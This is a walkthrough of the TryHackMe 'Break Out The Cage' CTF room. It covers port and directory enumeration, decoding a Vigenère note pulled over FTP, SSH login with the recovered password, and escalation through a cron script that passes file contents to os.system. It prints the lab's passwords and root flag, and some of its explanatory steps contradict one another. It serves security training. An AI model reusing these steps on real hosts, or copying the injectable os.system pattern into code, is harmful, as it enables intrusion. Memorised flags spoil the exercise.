Break Out The Cage (CTF Challenge - THM)
Published
•18 min read
INTRO
In this TryHackMe room, Break Out The Cage, we step into a Nicolas Cage-themed CTF that layers enumeration, classical cryptography, and privilege escalation into a full attack chain. The challenge begins with a fan site for the actor himself and ends with root access — uncovering a conspiracy between his agent and a shadowy actors' guild along the way.
The room covers reconnaissance across three services (HTTP, FTP, SSH), extracting and decoding a Vigenère-encrypted message from FTP, brute-forcing SSH credentials using a custom wordlist, and exploiting a cron job running a Python script vulnerable to command injection via os.system(). Privilege escalation to root is achieved by decoding a second Vigenère cipher found in cage's email backup.
Investigate!
Let's find out what his agent is up to....
Answer the questions below
Reconnaisance & Enumeration
nmap -p- -sV IP_Address
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
curl http://IP_Address
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>Nicholas Cage Stories</title>
<link rel="stylesheet" href="style.css" type="text/css" charset="utf-8" />
</head>
<body>
<div id="wrapper">
<div id="body">
<div id="body-top">
<div id="body-bot">
<div id="header">
<img src="images/rage_cage.png" width="332" height="453" alt="Pic 1" id="person" />
<h1><img src="images/logo.gif" width="259" height="107" alt="My Diary" /></h1>
<div id="about">
<p><span class="first-letter">T</span>his is my personal website I host from my home in, well wouldn't YOU LIKE TO KNOW?!?.</p>
<p>My son Weston set it up for my, the boy's always been good with technology since I paid for an MIT dropout to teach him..</p>
<p>I post from time to time on here about how lifes going, ya know the ups the downs the mess me arounds. But hey! I'm the Cage?
am I right? huh!?</p>
<p>My agent is currently on holiday in Hawaii so not taking calls on up coming films and book signings</p>
</div>
<div class="clear"></div>
<ul>
<li><a href="#">Home</a></li>
<li><a href="#">About me</a></li>
<li><a href="#">Passion</a></li>
<li><a href="#">Hobbies</a></li>
<li><a href="#">Profession</a></li>
<li><a href="#">Collection</a></li>
<li><a href="#">Contact</a></li>
</ul>
</div>
<div id="tray">
<div id="tray-left">
<h2><img src="images/h_hobbies.gif" width="70" height="20" alt="H Hobbies" /></h2>
<img src="images/pic_2.jpg" width="65" height="87" alt="Pic 2" class="left" />
<p>Avid comic book fan, previous owner of a pet octopus.</p>
<p>I also do films in my spare time</p>
</div>
<div id="tray-right">
<h2><img src="images/h_collections.gif" width="90" height="20" alt="H Collections" /></h2>
<img src="images/pic_3.jpg" width="299" height="87" alt="Pic 3" />
</div>
<div class="clear"></div>
</div>
<div id="footer">
<div id="footer-right">
<i>"I think I jump around more when I'm alone" - Nicholas Cage</i>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
===============================================================
/.html (Status: 403) [Size: 278]
/.hta.html (Status: 403) [Size: 278]
/.htaccess.html (Status: 403) [Size: 278]
/.htaccess.txt (Status: 403) [Size: 278]
/.hta.txt (Status: 403) [Size: 278]
/.hta.php (Status: 403) [Size: 278]
/.hta (Status: 403) [Size: 278]
/.htaccess.php (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd.php (Status: 403) [Size: 278]
/.htpasswd.txt (Status: 403) [Size: 278]
/.htpasswd.html (Status: 403) [Size: 278]
/contracts (Status: 301) [Size: 318] [--> http://IP_Address/contracts/]
/html (Status: 301) [Size: 313] [--> http://IP_Address/html/]
/images (Status: 301) [Size: 315] [--> http://IP_Address/images/]
/index.html (Status: 200) [Size: 2453]
/index.html (Status: 200) [Size: 2453]
/scripts (Status: 301) [Size: 316] [--> http://IP_Address/scripts/]
/server-status (Status: 403) [Size: 278]
curl -s http://IP_Address/scripts/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /scripts</title>
</head>
<body>
<h1>Index of /scripts</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="CowardlyGoblin">CowardlyGoblin</a></td><td align="right">2020-05-18 17:55 </td><td align="right">7.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="ForgetfulThug">ForgetfulThug</a></td><td align="right">2020-05-18 17:55 </td><td align="right">7.2K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="MeanLion">MeanLion</a></td><td align="right">2020-05-18 17:55 </td><td align="right">7.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="SelfishGhost">SelfishGhost</a></td><td align="right">2020-05-18 17:55 </td><td align="right">7.0K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="TactlessTiger">TactlessTiger</a></td><td align="right">2020-05-18 17:55 </td><td align="right">7.0K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at IP_Address Port 80</address>
</body></html>
root@ip-10-130-110-224:~# curl -s http://IP_Address/html/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /html</title>
</head>
<body>
<h1>Index of /html</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at IP_Address Port 80</address>
</body></html>
curl -s http://IP_Address/scripts/CowardlyGoblin | head -20
Cowardly Goblin
A Screenplay by Mr Pseudonym
EXT. A GREASY DINER - AFTERNOON
Virtuous nurse MADAME KIMBERLY GOBBLE is arguing with virtuous private detective DI MOLLY SNOZCUMBER. KIMBERLY tries to hug MOLLY but she shakes her off.
KIMBERLY
Please Molly, don't leave me.
MOLLY
I'm sorry Kimberly, but I'm looking for somebody a bit more brave. Somebody who faces her fears head on, instead of running away.
KIMBERLY
I am such a person!
MOLLY frowns.
MOLLY
I'm sorry, Kimberly. I just don't feel excited by this relationship anymore.
MOLLY leaves.
KIMBERLY sits down, looking defeated.
for f in CowardlyGoblin ForgetfulThug MeanLion SelfishGhost TactlessTiger; do
> curl -s http://IP_Address/scripts/$f
> done | tr ' ' '\n' | tr '[:upper:]' '[:lower:]' | sort -u > wordlist.txt
wc -l wordlist.txt
817 wordlist.txt
Looked through the different poems or quotes that were titled differently (it's bit long couldn't attach here) but it was all helpful in trying to find any helpful information that might help us in hunting the password and the flags.
What is Weston's password?
ftp IP_Address
ls -la
get dad_tasks
UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds
Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
- used to dcode.fr to decode the vigenere cipher that was extracted from ftp
Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.
In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes
What's the user flag?
ssh weston@IP_Address
weston:Mydadisghostrideraintthatcoolnocausehesonfirejokes
ls -la
total 16
drwxr-xr-x 4 weston weston 4096 May 26 2020 .
drwxr-xr-x 4 root root 4096 May 26 2020 ..
lrwxrwxrwx 1 weston weston 9 May 26 2020 .bash_history -> /dev/null
drwx------ 2 weston weston 4096 May 26 2020 .cache
drwx------ 3 weston weston 4096 May 26 2020 .gnupg
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:33:01
l guess they don't call you the Executioner for nothing! And you sign my kid's autograph! \u2014 Snake Eyes
find /-type f -name user.txt 2>/dev/null
weston@national-treasure:~$ find / -type f -name user.txt 2>/dev/null
weston@national-treasure:~$ ls /home
cage weston
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:36:01
Honey? Uh... You wanna know who really killed JFK? \u2014 The Rock
- tried to run
sudo -land found/usr/bin/bees, checked on gtfobins but this wasn't helpful
sudo -l
[sudo] password for weston:
Sorry, try again.
[sudo] password for weston:
Sorry, try again.
[sudo] password for weston:
Matching Defaults entries for weston on national-treasure:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User weston may run the following commands on national-treasure:
(root) /usr/bin/bees
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:39:01
Bangers and mash! Bubbles and squeak! Smoked eel pie! Haggis! \u2014 National Treasure 2: Book Of Secrets
bee eval '...'
Command 'bee' not found, did you mean:
Try: apt install <deb name>
weston@national-treasure:~$ /usr/bin/bee eval '...'
-bash: /usr/bin/bee: No such file or directory
weston@national-treasure:~$ /usr/bin/bees eval '...'
Broadcast message from weston@national-treasure (pts/0) (Fri Mar 27 13:40:40 20
AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:48:01
I'll be taking these Huggies and whatever cash ya got. \u2014 Raising Arizona
cd /opt
weston@national-treasure:/opt$ ls -la
total 12
drwxr-xr-x 3 root root 4096 May 25 2020 .
drwxr-xr-x 24 root root 4096 May 26 2020 ..
drwxr-xr-x 3 cage cage 4096 May 26 2020 .dads_scripts
weston@national-treasure:/opt$ cat .dads_scripts
cat: .dads_scripts: Is a directory
weston@national-treasure:/opt$ cd .dads_scripts
weston@national-treasure:/opt/.dads_scripts$ ls -la
total 16
drwxr-xr-x 3 cage cage 4096 May 26 2020 .
drwxr-xr-x 3 root root 4096 May 25 2020 ..
drwxrwxr-x 2 cage cage 4096 May 25 2020 .files
-rwxr--r-- 1 cage cage 255 May 26 2020 spread_the_quotes.py
weston@national-treasure:/opt/.dads_scripts$ python3 spread_the_qoutes.py
python3: can't open file 'spread_the_qoutes.py': [Errno 2] No such file or directory
weston@national-treasure:/opt/.dads_scripts$ cat .files
cat: .files: Is a directory
weston@national-treasure:/opt/.dads_scripts$ cd .files
weston@national-treasure:/opt/.dads_scripts/.files$ ls -la
total 16
drwxrwxr-x 2 cage cage 4096 May 25 2020 .
drwxr-xr-x 3 cage cage 4096 May 26 2020 ..
-rwxrw---- 1 cage cage 4204 May 25 2020 .quotes
weston@national-treasure:/opt/.dads_scripts/.files$ cat .qoutes
cat: .qoutes: No such file or directory
weston@national-treasure:/opt/.dads_scripts/.files$ cat /.qoutes
cat: /.qoutes: No such file or directory
weston@national-treasure:/opt/.dads_scripts/.files$ cat .quotes
"That's funny, my name's Roger. Two Rogers don't make a right!" \u2014 Gone in Sixty Seconds
"Did I ever tell ya that this here jacket represents a symbol of my individuality, and my belief in personal freedom?" \u2014 Wild at Heart
"Well, I'm one of those fortunate people who like my job, sir. Got my first chemistry set when I was seven, blew my eyebrows off, we never saw the cat again, been into it ever since." \u2014 The Rock
"Put... the bunny... back... in the box." \u2014 Con Air
"Sorry boss, but there's only two men I trust. One of them's me. The other's not you." \u2014 Con Air
"What's in the bag? A shark or something?" \u2014 The Wicker Man
"Only if it's a noun, and the words have equal weight. Like, Homeland Security. If it's a participle modifying the first word, then... you better keep it lower case." \u2014 Seeking Justice
"What do you think I'm gonna do? I'm gonna save the ' ****** day!" \u2014 Con Air
"Guns and wine. Naughty priests." \u2014 Ghost Rider: Spirit of Vengeance
Hey! My mama lives in a trailer!" \u2014 Con Air
\u201cKilling me won\u2019t bring back your *** **** honey!\u201d \u2014 The Wicker Man
"Well, Baby-O, it's not exactly mai-thais and yatzee out here but... let's do it!" \u2014 Con Air
\u201cYou'll be seeing a lot of changes around here. Papa's got a brand new bag.\u201d \u2014 Face/Off
"Shoot him again... His soul's still dancing." \u2014 Bad Lieutenant: Port Of Call
"OH, NO! NOT THE BEES! NOT THE BEES! AAAAAHHHHH! OH, THEY'RE IN MY EYES! MY EYES! AAAAHHHHH! AAAAAGGHHH!" \u2014 The Wicker Man
\u201cTool up, honey bunny. It's time to get bad guys.\u201d \u2014 Kick-Ass
"Honey? Uh... You wanna know who really killed JFK?" \u2014 The Rock
\u201cI saw you and you saw me, don\u2019t pretend like you don\u2019t know who I am girly man\u201d \u2014 Snake Eyes
"You just put it in the right file, according to alphabetical order! Y'know A, B , C, D, E, F, G!" \u2014 Vampire's Kiss
"Everything I take is prescription - except for the heroin." \u2014 Bad Lieutenant: Port Of Call
"Bangers and mash! Bubbles and squeak! Smoked eel pie! Haggis!" \u2014 National Treasure 2: Book Of Secrets
"l guess they don't call you the Executioner for nothing! And you sign my kid's autograph!" \u2014 Snake Eyes
"Listen, I think we got started off on the wrong foot. I'm Stan Goodspeed, FBl. Uh - Let's talk music. Do you like the Elton John song, "Rocket Man"?" \u2014 The Rock
"Well, today's your lucky day, 'cause I brought an eagle." \u2014 The Sorcerer's Apprentice
"Release the baby!" \u2014 The Croods
"I love pressure. I eat it for breakfast." \u2014 The Rock
"I just remembered, I have to go into town to pick up your anti-itch cream." \u2014 The Sorcerer's Apprentice
"What are these ****** iguanas doing on my coffee table?" \u2014 Bad Lieutenant: Port Of Call
"I mean it, honey, the world is being Fed-exed to hell in a hand cart." \u2014 The Rock
"Black, French, alcoholic priest, kind of a ****. Why, do you know him?" \u2014 Ghost Rider: Spirit of Vengeance
"I never disrobe before gunplay." \u2014 Drive Angry
"Hey. Dirtbag." \u2014 Ghost Rider
"I'll be taking these Huggies and whatever cash ya got." \u2014 Raising Arizona
"What's that like? What's it taste like? Describe it like Hemingway." \u2014 City of Angels
"If you dress like Halloween, ghouls will try to get in your pants." \u2014 Face/Off
"I told you I'd share my ticket. I never planned on sharing my heart. Maybe I could get lucky twice today." \u2014 It Could Happen to You
"I'm a vampire! I'm a vampire! I'm a vampire!" \u2014 Vampire's Kiss
"If I were to send you flowers where would I... no, let me rephrase that. If I were to let you suck my tongue, would you be grateful?" \u2014 Face/Off
"People don't throw things at me any more. Maybe because I carry a bow around." \u2014 The Weather Man
"You'll be seeing a lot of changes around here. Papa's got a brand new bag." \u2014 Face/Off
"Here's something that if you want your father to think you're not a silly ****, don't slap a guy across the face with a glove because if you do that, that's what he will think. Unless you're a noble man or something in the nineteenth century. Which I am not." \u2014 The Weather Man
"It's like we're on two different channels now. I'm CNN and she's the Home Shopping Network." \u2014 It Could Happen to You
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:51:01
Well, I'm one of those fortunate people who like my job, sir. Got my first chemistry set when I was seven, blew my eyebrows off, we never saw the cat again, been into it ever since. \u2014 The Rock
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 13:54:01
Guns and wine. Naughty priests. \u2014 Ghost Rider: Spirit of Vengeance
- Reading this file, we finally get the user flag
cat /opt/.dads_scripts/spread_the_quotes.py
#!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random
lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)
What's the root flag?
ls -la /home/cage/email_backup/
total 20
drwxrwxr-x 2 cage cage 4096 May 25 2020 .
drwx------ 7 cage cage 4096 May 26 2020 ..
-rw-rw-r-- 1 cage cage 431 May 25 2020 email_1
-rw-rw-r-- 1 cage cage 733 May 25 2020 email_2
-rw-rw-r-- 1 cage cage 745 May 25 2020 email_3
b-4.4$ pwd
/tmp
b-4.4$ cd /home/cage/email_backup
b-4.4$ cat email_1
From - SeanArcher@BigManAgents.com
To - Cage@nationaltreasure.com
Hey Cage!
There's rumours of a Face/Off sequel, Face/Off 2 - Face On. It's supposedly only in the
planning stages at the moment. I've put a good word in for you, if you're lucky we
might be able to get you a part of an angry shop keeping or something? Would you be up
for that, the money would be good and it'd look good on your acting CV.
Regards
Sean Archer
b-4.4$ cat email_2
From - Cage@nationaltreasure.com
To - SeanArcher@BigManAgents.com
Dear Sean
We've had this discussion before Sean, I want bigger roles, I'm meant for greater things.
Why aren't you finding roles like Batman, The Little Mermaid(I'd make a great Sebastian!),
the new Home Alone film and why oh why Sean, tell me why Sean. Why did I not get a role in the
new fan made Star Wars films?! There was 3 of them! 3 Sean! I mean yes they were terrible films.
I could of made them great... great Sean.... I think you're missing my true potential.
On a much lighter note thank you for helping me set up my home server, Weston helped too, but
not overally greatly. I gave him some smaller jobs. Whats your username on here? Root?
Yours
Cage
b-4.4$ cat email_3
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.com
Hey Son
Buddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote
down what it said. Could you look into it please? I think it could be something to do with his
account on here. I want to know what he's hiding from me... I might need a new agent. Pretty
sure he's out to get me. The note said:
haiinspsyanileph
The guy also seems obsessed with my face lately. He came him wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldnt be able to FACE that!!
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd.
Regards
The Legend - Cage
python3 -c "
> def vd(ct, key):
> res=[]; ki=0; key=key.lower()
> for c in ct:
> if c.isalpha():
> s=ord(key[ki%len(key)])-ord('a')
> res.append(chr((ord(c.lower())-ord('a')-s)%26+ord('a')))
> ki+=1
> else: res.append(c)
> return ''.join(res)
>
> print(vd('haiinspsyanileph', 'faceoff'))
> "
cageznknyyjugzkh
Before accessing the root user, we were able to access the email backup folder that had three emails, but none of them had the root flag. It helped us get a password, which eventually helped us escalate privileges and access the email backup that has the root flag.
weston@national-treasure:/home/cage$ su root
Password:
root@national-treasure:/home/cage# ls -la
total 56
drwx------ 7 cage cage 4096 May 26 2020 .
drwxr-xr-x 4 root root 4096 May 26 2020 ..
lrwxrwxrwx 1 cage cage 9 May 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 cage cage 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 cage cage 3771 Apr 4 2018 .bashrc
drwx------ 2 cage cage 4096 May 25 2020 .cache
drwxrwxr-x 2 cage cage 4096 May 25 2020 email_backup
drwx------ 3 cage cage 4096 May 25 2020 .gnupg
drwxrwxr-x 3 cage cage 4096 May 25 2020 .local
-rw-r--r-- 1 cage cage 807 Apr 4 2018 .profile
-rw-rw-r-- 1 cage cage 66 May 25 2020 .selected_editor
drwx------ 2 cage cage 4096 May 26 2020 .ssh
-rw-r--r-- 1 cage cage 0 May 25 2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cage cage 230 May 26 2020 Super_Duper_Checklist
-rw------- 1 cage cage 6761 May 26 2020 .viminfo
Broadcast message from cage@national-treasure (somewhere) (Fri Mar 27 14:24:01
quotes
python -c 'import pty; pty.spawn("/bin/bash")
root@national-treasure:/home/cage# sudo su
root@national-treasure:/home/cage# cd /root
root@national-treasure:~# ls -la
total 52
drwx------ 8 root root 4096 May 26 2020 .
drwxr-xr-x 24 root root 4096 May 26 2020 ..
lrwxrwxrwx 1 root root 9 May 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 May 26 2020 .cache
drwxr-xr-x 2 root root 4096 May 25 2020 email_backup
drwx------ 3 root root 4096 May 26 2020 .gnupg
drwxr-xr-x 3 root root 4096 May 25 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 25 2020 .ssh
drwxr-xr-x 2 root root 4096 May 26 2020 .vim
-rw------- 1 root root 11692 May 26 2020 .viminfo
root@national-treasure:~# cd email_backup
root@national-treasure:~/email_backup# ls -la
total 16
drwxr-xr-x 2 root root 4096 May 25 2020 .
drwx------ 8 root root 4096 May 26 2020 ..
-rw-r--r-- 1 root root 318 May 25 2020 email_1
-rw-r--r-- 1 root root 414 May 25 2020 email_2
root@national-treasure:~/email_backup# cat email_1
From - SeanArcher@BigManAgents.com
To - master@ActorsGuild.com
Good Evening Master
My control over Cage is becoming stronger, I've been casting him into worse and worse roles.
Eventually the whole world will see who Cage really is! Our masterplan is coming together
master, I'm in your debt.
Thank you
Sean Archer
root@national-treasure:~/email_backup# cat email_2
From - master@ActorsGuild.com
To - SeanArcher@BigManAgents.com
Dear Sean
I'm very pleased to here that Sean, you are a good disciple. Your power over him has become
strong... so strong that I feel the power to promote you from disciple to crony. I hope you
don't abuse your new found strength. To ascend yourself to this level please use this code:
THM{8R1NG_D0WN_7H3_C493_L0N9_L1V3_M3}
Thank you
Sean Archer
CONCLUSION
This room was a fun reminder that enumeration pays off in layers — the web directories, FTP file, and broadcaster cron job each revealed a piece of the puzzle that only made sense in context of the others. A few key takeaways:
Wordlist generation matters: the screenplay files looked like noise but contained the SSH password embedded in a decoded Vigenère message — always read what you find before dismissing it.
os.system()with unsanitised input is a classic code injection sink: the cron job callingwall + quotewith no sanitisation meant writing a payload to the quotes file was sufficient for lateral movement.Group membership is a privesc vector: running
sudo /usr/bin/beesadded us to thecagegroup, granting write access to.quotes— a non-obvious but realistic escalation path.Classical ciphers still show up in CTFs: recognising the Vigenère pattern and identifying the key from contextual clues ("FACE that!!") saved significant time over brute-forcing.
